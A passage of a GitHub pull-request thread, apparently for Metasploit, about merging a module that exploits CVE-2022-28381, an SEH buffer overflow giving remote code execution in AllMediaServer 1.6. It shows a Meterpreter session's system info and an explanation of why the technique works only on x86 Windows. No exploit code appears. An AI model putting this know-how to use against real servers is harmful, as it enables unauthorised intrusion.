OS              : Windows 10 (10.0 Build 19043).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x86/windows
meterpreter > 

Nice ❤❤👍🏻

[gwillcox-r7]

Should be good to land when tests pass, just got to wait for our backend checks to get over whatever hurdle it is they are currently stuck on.

[Matrix07ksa]

Should be good to land when tests pass, just got to wait for our backend checks to get over whatever hurdle it is they are currently stuck on.

Excellent❤🌹👍🏻

[jmartin-tech]

@msjenkins-r7 test this please.

[gwillcox-r7]

Alright tests have passed will land this now. Thanks for submission @Matrix07ksa!

[Matrix07ksa]

Alright tests have passed will land this now. Thanks for submission @Matrix07ksa!

Thank you for everything brother, I look forward to the next one in the future
❤🌹👍🏻

[gwillcox-r7]

Release Notes

A new module has been added in which exploits CVE-2022-28381, a remotely exploitable SEH buffer overflow vulnerability in AllMediaServer version 1.6 and prior. Successful exploitation results in remote code execution as the user running AllMediaServer.

[Matrix07ksa]

If any version of Windows 7 or 8 or 10 or 11 is running on x86, it will be hacked correctly as shown in the attached photos في السبت، ٢ أبريل ٢٠٢٢ ٣:٣٦ ص حجاب زائري ***@***.***> كتب:

…

Yes, it is configured on x86 architecture في السبت، ٢ أبريل ٢٠٢٢ ٣:٣٣ ص Grant Willcox ***@***.***> كتب: > Do you see the attached pictures? > > Nope I don't. Also the payload type doesn't matter. The problem is that > SEH handling techniques changed with x64 architecture so the way this > exploit is coded with overwriting the SEH handler to get code execution, > one can only make the exploit on x86 systems. It will not work against > systems running x64 versions of Windows due to the fact that the way SEH > was implemented was changed on the x64 architecture and it doesn't work the > same way as x86 versions of Windows. > > — > Reply to this email directly, view it on GitHub > <#16399 (comment)>, > or unsubscribe > <https://github.com/notifications/unsubscribe-auth/AIAUBYUC6OLJ7PP2I7TOGBLVC6IVLANCNFSM5SJPVPQQ> > . > You are receiving this because you were mentioned.Message ID: > ***@***.***> >

[Matrix07ksa]

Yes, it is configured on x86 architecture في السبت، ٢ أبريل ٢٠٢٢ ٣:٣٣ ص Grant Willcox ***@***.***> كتب:

…

Do you see the attached pictures? Nope I don't. Also the payload type doesn't matter. The problem is that SEH handling techniques changed with x64 architecture so the way this exploit is coded with overwriting the SEH handler to get code execution, one can only make the exploit on x86 systems. It will not work against systems running x64 versions of Windows due to the fact that the way SEH was implemented was changed on the x64 architecture and it doesn't work the same way as x86 versions of Windows. — Reply to this email directly, view it on GitHub <#16399 (comment)>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AIAUBYUC6OLJ7PP2I7TOGBLVC6IVLANCNFSM5SJPVPQQ> . You are receiving this because you were mentioned.Message ID: ***@***.***>